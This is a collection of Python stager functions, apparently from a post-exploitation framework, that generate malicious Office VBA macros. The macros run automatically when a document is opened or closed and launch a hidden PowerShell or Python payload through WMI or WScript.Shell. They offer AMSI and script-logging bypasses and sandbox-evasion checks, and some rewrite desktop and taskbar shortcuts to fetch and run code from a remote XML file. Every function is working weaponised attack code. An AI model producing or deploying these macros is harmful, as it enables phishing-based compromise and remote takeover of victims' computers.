def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] obfuscate = self.options['Obfuscate']['Value'] obfuscateCommand = self.options['ObfuscateCommand']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] obfuscateScript = False if obfuscate.lower() == "true": obfuscateScript = True # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) Str = ''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName)))) Method=''.join(random.choice(string.letters) for i in range(random.randint(1,len(listenerName)))) if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: chunks = list(helpers.chunks(launcher, 50)) payload = "\tDim "+Str+" As String\n" payload += "\t"+Str+" = \"" + str(chunks[0]).replace("\"", "\"\"") + "\"\n" for chunk in chunks[1:]: payload += "\t"+Str+" = "+Str+" + \"" + str(chunk).replace("\"", "\"\"") + "\"\n" macro = "Sub Auto_Open()\n" macro += "\t"+Method+"\n" macro += "End Sub\n\n" macro = "Sub AutoOpen()\n" macro += "\t"+Method+"\n" macro += "End Sub\n\n" macro += "Sub Document_Open()\n" macro += "\t"+Method+"\n" macro += "End Sub\n\n" macro += "Public Function "+Method+"() As Variant\n" macro += payload macro += "\tConst HIDDEN_WINDOW = 0\n" macro += "\tstrComputer = \".\"\n" macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n" macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n" macro += "\tSet objConfig = objStartup.SpawnInstance_\n" macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n" macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n" macro += "\tobjProcess.Create "+Str+", Null, objConfig, intProcessID\n" macro += "End Function\n" return macro
def generate(self): # extract all of our options listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] noiselevel = int(self.options['NoiseLevel']['Value']) # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: launcher, noise = self.addnoise(launcher, noiselevel) chunks = list(helpers.chunks(launcher, 50)) payload = "\tDim Str As String\n" payload += "\tDim Noise As String\n" payload += "\tDim Counter As Integer\n" payload += "\tnoise = \"" + noise + "\"\n" payload += "\tstr = \"" + str(chunks[0]) + "\"\n" for chunk in chunks[1:]: payload += "\tstr = str + \"" + str(chunk) + "\"\n" payload += "\tFor counter = 1 to len(noise)\n" payload += "\tstr = replace(str,mid(noise,counter,1),\"\")\n" payload += "\tNext\n" macro = "Sub Auto_Open()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" macro = "Sub AutoOpen()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" macro += "Sub Document_Open()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" macro += "Public Function Debugging() As Variant\n" macro += payload macro += "\tConst HIDDEN_WINDOW = 0\n" macro += "\tstrComputer = \".\"\n" macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n" macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n" macro += "\tSet objConfig = objStartup.SpawnInstance_\n" macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n" macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n" macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n" macro += "End Function\n" return macro
def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: chunks = list(helpers.chunks(launcher, 50)) payload = "\tDim Str As String\n" payload += "\tstr = \"" + str(chunks[0]) + "\"\n" for chunk in chunks[1:]: payload += "\tstr = str + \"" + str(chunk) + "\"\n" macro = "Sub Auto_Open()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" macro = "Sub AutoOpen()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" macro += "Sub Document_Open()\n" macro += "\tDebugging\n" macro += "End Sub\n\n" macro += "Public Function Debugging() As Variant\n" macro += payload macro += "\tConst HIDDEN_WINDOW = 0\n" macro += "\tstrComputer = \".\"\n" macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n" macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n" macro += "\tSet objConfig = objStartup.SpawnInstance_\n" macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n" macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n" macro += "\tobjProcess.Create str, Null, objConfig, intProcessID\n" macro += "End Function\n" return macro
def generate(self): def formStr(varstr, instr): holder = [] str1 = '' str2 = '' str1 = varstr + ' = "' + instr[:54] + '"' for i in range(54, len(instr), 48): holder.append('\t\t' + varstr + ' = ' + varstr + ' + "' + instr[i:i + 48]) str2 = '"\r\n'.join(holder) str2 = str2 + "\"" str1 = str1 + "\r\n" + str2 return str1 # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] obfuscate = self.options['Obfuscate']['Value'] obfuscateCommand = self.options['ObfuscateCommand']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] safeChecks = self.options['SafeChecks']['Value'] pixelTrackURL = self.options['PixelTrackURL']['Value'] scriptLogBypass = self.options['ScriptLogBypass']['Value'] AMSIBypass = self.options['AMSIBypass']['Value'] AMSIBypass2 = self.options['AMSIBypass2']['Value'] invokeObfuscation = False if obfuscate.lower() == "true": invokeObfuscation = True scriptLogBypassBool = False if scriptLogBypass.lower() == "true": scriptLogBypassBool = True AMSIBypassBool = False if AMSIBypass.lower() == "true": AMSIBypassBool = True AMSIBypass2Bool = False if AMSIBypass2.lower() == "true": AMSIBypass2Bool = True # generate the python launcher code pylauncher = self.mainMenu.stagers.generate_launcher( listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks) if pylauncher == "": print( helpers.color( "[!] Error in python launcher command generation.")) return "" # render python launcher into python payload pylauncher = pylauncher.replace("\"", "\"\"") for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL): pypayload = formStr("str", match) # generate the powershell launcher code poshlauncher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=True, obfuscate=invokeObfuscation, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries, safeChecks=safeChecks, scriptLogBypass=scriptLogBypassBool, AMSIBypass=AMSIBypassBool, AMSIBypass2=AMSIBypass2Bool) if poshlauncher == "": print( helpers.color( "[!] Error in powershell launcher command generation.")) return "" # render powershell launcher into powershell payload poshchunks = list(helpers.chunks(poshlauncher, 50)) poshpayload = "Dim Str As String" poshpayload += "\n\t\tstr = \"" + str(poshchunks[0]) for poshchunk in poshchunks[1:]: poshpayload += "\n\t\tstr = str + \"" + str(poshchunk) # if statements below are for loading Mac dylibs for compatibility macro = """#If Mac Then #If VBA7 Then Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long #Else Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long #End If #End If Sub AutoOpen() 'MsgBox("AutoOpen()") Debugging End Sub Sub Auto_Open() 'MsgBox("Auto_Open()") Debugging End Sub Sub Document_Open() 'MsgBox("Document_Open()") Debugging End Sub Public Function Debugging() As Variant On Error Resume Next Dim tracking As String tracking = "%s" #If Mac Then 'Mac Rendering If Val(Application.Version) < 15 Then 'Mac Office 2011 system ("curl " & tracking & "Mac2011") Else 'Mac Office 2016 system ("curl " & tracking & "Mac2016") End If Dim result As Long Dim str As String %s 'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python3 &") result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | python3 &") #Else 'Windows Rendering Dim objWeb As Object Set objWeb = CreateObject("Microsoft.XMLHTTP") objWeb.Open "GET", tracking & "Windows", False objWeb.send %s 'MsgBox(str) Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process") objProcess.Create str, Null, objConfig, intProcessID #End If End Function""" % (pixelTrackURL, pypayload, poshpayload) return macro
def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] obfuscate = self.options['Obfuscate']['Value'] obfuscateCommand = self.options['ObfuscateCommand']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] obfuscateScript = False if obfuscate.lower() == "true": obfuscateScript = True # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=True, obfuscate=obfuscateScript, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) Str = ''.join( random.choice(string.letters) for i in range(random.randint(1, len(listenerName)))) Method = ''.join( random.choice(string.letters) for i in range(random.randint(1, len(listenerName)))) if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: chunks = list(helpers.chunks(launcher, 50)) payload = "\tDim " + Str + " As String\n" payload += "\t" + Str + " = \"" + str(chunks[0]).replace( "\"", "\"\"") + "\"\n" for chunk in chunks[1:]: payload += "\t" + Str + " = " + Str + " + \"" + str( chunk).replace("\"", "\"\"") + "\"\n" macro = "Sub Auto_Open()\n" macro += "\t" + Method + "\n" macro += "End Sub\n\n" macro += "Sub AutoOpen()\n" macro += "\t" + Method + "\n" macro += "End Sub\n\n" macro += "Sub Document_Open()\n" macro += "\t" + Method + "\n" macro += "End Sub\n\n" macro += "Public Function " + Method + "() As Variant\n" macro += payload macro += "\tConst HIDDEN_WINDOW = 0\n" macro += "\tstrComputer = \".\"\n" macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2\")\n" macro += "\tSet objStartup = objWMIService.Get(\"Win32_ProcessStartup\")\n" macro += "\tSet objConfig = objStartup.SpawnInstance_\n" macro += "\tobjConfig.ShowWindow = HIDDEN_WINDOW\n" macro += "\tSet objProcess = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\\cimv2:Win32_Process\")\n" macro += "\tobjProcess.Create " + Str + ", Null, objConfig, intProcessID\n" macro += "End Function\n" return macro
def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] base64 = self.options['Base64']['Value'] obfuscate = self.options['Obfuscate']['Value'] obfuscateCommand = self.options['ObfuscateCommand']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] safeChecks = self.options['SafeChecks']['Value'] scriptLogBypass = self.options['ScriptLogBypass']['Value'] AMSIBypass = self.options['AMSIBypass']['Value'] AMSIBypass2 = self.options['AMSIBypass2']['Value'] OutlookEvasion = self.options['OutlookEvasion']['Value'] encode = False if base64.lower() == "true": encode = True invokeObfuscation = False if obfuscate.lower() == "true": invokeObfuscation = True scriptLogBypassBool = False if scriptLogBypass.lower() == "true": scriptLogBypassBool = True AMSIBypassBool = False if AMSIBypass.lower() == "true": AMSIBypassBool = True AMSIBypass2Bool = False if AMSIBypass2.lower() == "true": AMSIBypass2Bool = True OutlookEvasionBool = False if OutlookEvasion.lower() == "true": OutlookEvasionBool = True # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=encode, obfuscate=invokeObfuscation, obfuscationCommand=obfuscateCommand, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries, safeChecks=safeChecks, scriptLogBypass=scriptLogBypassBool, AMSIBypass=AMSIBypassBool, AMSIBypass2=AMSIBypass2Bool) Str = ''.join( random.choice(string.ascii_letters) for i in range(random.randint(1, len(listenerName)))) Method = ''.join( random.choice(string.ascii_letters) for i in range(random.randint(1, len(listenerName)))) if launcher == "": print(helpers.color("[!] Error in launcher command generation.")) return "" else: chunks = list(helpers.chunks(launcher, 50)) payload = "\tDim " + Str + " As String\n" payload += "\t" + Str + " = \"" + str(chunks[0]) + "\"\n" for chunk in chunks[1:]: payload += "\t" + Str + " = " + Str + " + \"" + str( chunk) + "\"\n" macro = "Sub AutoClose()\n" macro += "\t" + Method + "\n" macro += "End Sub\n\n" macro += "Public Function " + Method + "() As Variant\n" if OutlookEvasionBool == True: macro += "\tstrComputer = \".\"\n" macro += "\tSet objWMIService = GetObject(\"winmgmts:\\\\\" & strComputer & \"\\root\cimv2\")\n" macro += "\tSet ID = objWMIService.ExecQuery(\"Select IdentifyingNumber from Win32_ComputerSystemproduct\")\n" macro += "\tFor Each objItem In ID\n" macro += "\t\tIf StrComp(objItem.IdentifyingNumber, \"2UA20511KN\") = 0 Then End\n" macro += "\tNext\n" macro += "\tSet disksize = objWMIService.ExecQuery(\"Select Size from Win32_logicaldisk\")\n" macro += "\tFor Each objItem In disksize\n" macro += "\t\tIf (objItem.Size = 42949603328#) Then End\n" macro += "\t\tIf (objItem.Size = 68719443968#) Then End\n" macro += "\tNext\n" macro += payload macro += "\tSet asd = CreateObject(\"WScript.Shell\")\n" macro += "\tasd.Run(" + Str + ")\n" macro += "End Function\n" return macro
def generate(self): def formStr(varstr, instr): holder = [] str1 = '' str2 = '' str1 = varstr + ' = "' + instr[:54] + '"' for i in xrange(54, len(instr), 48): holder.append('\t\t' + varstr + ' = '+ varstr +' + "'+instr[i:i+48]) str2 = '"\r\n'.join(holder) str2 = str2 + "\"" str1 = str1 + "\r\n"+str2 return str1 # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] safeChecks = self.options['SafeChecks']['Value'] pixelTrackURL = self.options['PixelTrackURL']['Value'] # generate the python launcher code pylauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="python", encode=True, userAgent=userAgent, safeChecks=safeChecks) if pylauncher == "": print helpers.color("[!] Error in python launcher command generation.") return "" # render python launcher into python payload pylauncher = pylauncher.replace("\"", "\"\"") for match in re.findall(r"'(.*?)'", pylauncher, re.DOTALL): pypayload = formStr("str", match) # generate the powershell launcher code poshlauncher = self.mainMenu.stagers.generate_launcher(listenerName, language="powershell", encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) if poshlauncher == "": print helpers.color("[!] Error in powershell launcher command generation.") return "" # render powershell launcher into powershell payload poshchunks = list(helpers.chunks(poshlauncher, 50)) poshpayload = "Dim Str As String" poshpayload += "\n\t\tstr = \"" + str(poshchunks[0]) for poshchunk in poshchunks[1:]: poshpayload += "\n\t\tstr = str + \"" + str(poshchunk) # if statements below are for loading Mac dylibs for compatibility macro = """#If Mac Then #If VBA7 Then Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long #Else Private Declare Function system Lib "libc.dylib" (ByVal command As String) As Long #End If #End If Sub Auto_Open() 'MsgBox("Auto_Open()") Debugging End Sub Sub Document_Open() 'MsgBox("Document_Open()") Debugging End Sub Public Function Debugging() As Variant On Error Resume Next Dim tracking As String tracking = "%s" #If Mac Then 'Mac Rendering If Val(Application.Version) < 15 Then 'Mac Office 2011 system ("curl " & tracking & "Mac2011") Else 'Mac Office 2016 system ("curl " & tracking & "Mac2016") End If Dim result As Long Dim str As String %s 'MsgBox("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &") result = system("echo ""import sys,base64;exec(base64.b64decode(\\\"\" \" & str & \" \\\"\"));"" | /usr/bin/python &") #Else 'Windows Rendering Dim objWeb As Object Set objWeb = CreateObject("Microsoft.XMLHTTP") objWeb.Open "GET", tracking & "Windows", False objWeb.send %s 'MsgBox(str) Set objWMIService = GetObject("winmgmts:\\\\.\\root\cimv2") Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_ objConfig.ShowWindow = 0 Set objProcess = GetObject("winmgmts:\\\\.\\root\cimv2:Win32_Process") objProcess.Create str, Null, objConfig, intProcessID #End If End Function""" % (pixelTrackURL, pypayload, poshpayload) return macro
def generate(self): # extract all of our options language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] lnkPath = self.options['LNKPath']['Value'] XmlPath = self.options['XmlUrl']['Value'] XmlOut = self.options['XmlOutFile']['Value'] regParts = XmlPath.split("\\") path = "\\".join(regParts[0:len(regParts)-1]) name = regParts[len(regParts)-1] # generate the launcher code launcher = self.mainMenu.stagers.generate_launcher(listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) launcher = launcher.split(" ")[-1] if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: chunks = list(helpers.chunks(launcher, 50)) payload = "\tDim encRP As String\n" payload += "\tencRP = \"" + str(chunks[0]) + "\"\n" for chunk in chunks[1:]: payload += "\tencRP = encRP + \"" + str(chunk) + "\"\n" macro = "Sub Auto_Open()\n" macro += "\tOffice\n" macro += "End Sub\n\n" macro += "Public Function Office() As Variant\n" # macro += payload macro += "Dim myWS As Object, lnk as Object\n" macro += "Set myWS = CreateObject(\"Wscript.Shell\")\n" #set up first link - creates / replaces iexplore.lnk (display name iexplore) on users desktop if it sees it macro += "Set lnk = myWS.CreateShortcut(myWS.SPecialFolders(\"desktop\") & \"\\iexplore.lnk\")\n" launchString1 = "[System.Diagnostics.Process]::Start(\"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\");$b = New-Object System.Xml.XmlDocument;$b.Load(\"" launchString2 = "\");[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\n" macro += "lnk.targetpath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"\n" launchString1 = helpers.randomize_capitalization(launchString1) launchString2 = helpers.randomize_capitalization(launchString2) launchString = launchString1 + XmlPath + launchString2 encLaunch = helpers.enc_powershell(launchString) macro += "lnk.arguments = \"-w hidden -nop -enc " + encLaunch + "\"\n" macro += "lnk.IconLocation = \"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"\n" macro += "lnk.save\n" #2nd link here -- will overwite ie if it finds a file named 'Internet Explorer' in the taskbar menu macro += "Set lnk = myWS.CreateShortcut(Environ(\"AppData\") & \"\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\Internet Explorer.lnk\")\n" macro += "lnk.targetpath = \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe \"\n" macro += "lnk.arguments = \"-w hidden -nop -enc " + encLaunch + "\"\n" macro += "lnk.IconLocation = \"C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\"\n" macro += "lnk.save\n" macro += "End Function\n" #write XML to disk f = open(XmlOut,"w") f.write("<?xml version=\"1.0\"?>\n") f.write("<command>\n") f.write("\t<a>\n") f.write("\t<execute>"+launcher+"</execute>\n") f.write("\t</a>\n") f.write("</command>\n") return macro
def generate(self): # setting variables language = self.options['Language']['Value'] listenerName = self.options['Listener']['Value'] userAgent = self.options['UserAgent']['Value'] proxy = self.options['Proxy']['Value'] proxyCreds = self.options['ProxyCreds']['Value'] stagerRetries = self.options['StagerRetries']['Value'] targetEXE = self.options['TargetEXEs']['Value'] XmlPath = self.options['XmlUrl']['Value'] XmlOut = self.options['XmlOutFile']['Value'] targetEXE = targetEXE.split(',') targetEXE = filter(None, targetEXE) fncDecryptName = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 15))) shellVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) lnkVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) fsoVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) folderVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) fileVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) encStrVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) tempStrVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) shiftVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) offsetVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) blockVar = ''.join( random.sample(string.ascii_uppercase + string.ascii_lowercase, random.randint(10, 25))) # generate the launcher launcher = self.mainMenu.stagers.generate_launcher( listenerName, language=language, encode=True, userAgent=userAgent, proxy=proxy, proxyCreds=proxyCreds, stagerRetries=stagerRetries) launcher = launcher.split(" ")[-1] if launcher == "": print helpers.color("[!] Error in launcher command generation.") return "" else: #build out the macro - will look for all .lnk files on the desktop, any that it finds it will inspect to determine whether it matches any of the target exe names macro = "Sub Auto_Close()\n" #macro += "Dim " + shellVar + " As Object, " + lnkVar + " as Object, " + blockVar + " as String\n" macro += "Set " + shellVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder( "Wscript.Shell") + "\"))\n" macro += "Set " + fsoVar + " = CreateObject(" + fncDecryptName + "(\"" + self.encoder( "Scripting.FileSystemObject") + "\"))\n" macro += "Set " + folderVar + " = " + fsoVar + ".GetFolder(" + shellVar + ".SpecialFolders(\"desktop\"))\n" macro += "For Each " + fileVar + " In " + folderVar + ".Files\n" macro += "If(InStr(Lcase(" + fileVar + "), \".lnk\")) Then\n" macro += "Set " + lnkVar + " = " + shellVar + ".CreateShortcut(" + shellVar + ".SPecialFolders(\"desktop\") & \"\\\" & " + fileVar + ".name)\n" macro += "If(" for i, item in enumerate(targetEXE): if i: macro += (' or ') macro += "InStr(Lcase(" + lnkVar + ".targetPath), " + fncDecryptName + "(\"" + self.encoder( targetEXE[i].strip().lower() + ".") + "\"))" macro += ") Then\n" #writing out and obfuscating the command that will be executed upon clicking the backdoored .lnk launchString1 = " -w hidden -nop -command \"[System.Diagnostics.Process]::Start(\'" launchString2 = "& " + lnkVar + ".targetPath & " launchString3 = "\');$u=New-Object -comObject wscript.shell;Get-ChildItem -Path $env:USERPROFILE\desktop -Filter *.lnk | foreach { $lnk = $u.createShortcut($_.FullName); if($lnk.arguments -like \'*xml.xmldocument*\') {$start = $lnk.arguments.IndexOf(\'\'\'\') + 1; $result = $lnk.arguments.Substring($start, $lnk.arguments.IndexOf(\'\'\'\', $start) - $start );$lnk.targetPath = $result; $lnk.Arguments = \'\'; $lnk.Save()}};$b = New-Object System.Xml.XmlDocument;$b.Load(\'" launchString4 = "\');[Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String($b.command.a.execute))|IEX\"" launchString1 = helpers.randomize_capitalization(launchString1) launchString2 = helpers.randomize_capitalization(launchString2) launchString3 = helpers.randomize_capitalization(launchString3) launchString4 = helpers.randomize_capitalization(launchString4) #the encoded script gets long, this snippet chunks data to a more manageable size, keeps vbscript from erroring out due to a line over 1023 chars chunks = list( helpers.chunks( self.encoder(launchString3 + XmlPath + launchString4), random.randint(600, 750))) macro += blockVar + " = \"" + str(chunks[0]) + "\"\n" for chunk in chunks[1:]: macro += blockVar + " = " + blockVar + " + \"" + str( chunk) + "\"\n" #part of the macro that actually modifies the LNK files on the desktop, sets iconlocation for updated lnk to the old targetpath, args to our launch code, and target to powershell so we can do a direct call to it macro += lnkVar + ".IconLocation = " + lnkVar + ".targetpath\n" launchString = fncDecryptName + "(\"" + self.encoder( launchString1 ) + "\")" + launchString2 + fncDecryptName + "(" + blockVar + ")\n" macro += lnkVar + ".arguments = " + launchString macro += lnkVar + ".targetpath = left(CurDir, InStr(CurDir, \":\")-1) & " + fncDecryptName + "(\"" + self.encoder( ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" ) + "\")\n" macro += lnkVar + ".save\n" macro += "end if\n" macro += "end if\n" macro += "next " + fileVar + "\n" macro += "End Sub\n\n" #de-obfuscation function written into macro, this is called at the macro's runtime and converts obfuscated text back to ascii macro += "Function " + fncDecryptName + "(" + encStrVar + ") as String\n" macro += "Dim " + tempStrVar + ", " + shiftVar + ", " + offsetVar + "\n" macro += shiftVar + " = CLng(\"&H\" & Left(" + encStrVar + ", 1))\n" macro += offsetVar + " = CLng(\"&H\" & Mid(" + encStrVar + ", 2, 2)) + 4\n" macro += "For i = " + offsetVar + " To Len(" + encStrVar + ") Step 3\n" macro += tempStrVar + " = " + tempStrVar + " & Chr(CLng(\"&H\" & Mid(" + encStrVar + ",i,2)) + " + shiftVar + ")\n" macro += "Next\n" macro += fncDecryptName + " = " + tempStrVar + "\n" macro += "End Function" #writes XML intermediate stager to disk print("Writing xml...\n") f = open(XmlOut, "w") f.write("<?xml version=\"1.0\"?>\n") f.write("<command>\n") f.write("\t<a>\n") f.write("\t<execute>" + launcher + "</execute>\n") f.write("\t</a>\n") f.write("</command>\n") print( "xml written to " + XmlOut + " please remember this file must be accessible by the target at this url: " + XmlPath + "\n") return macro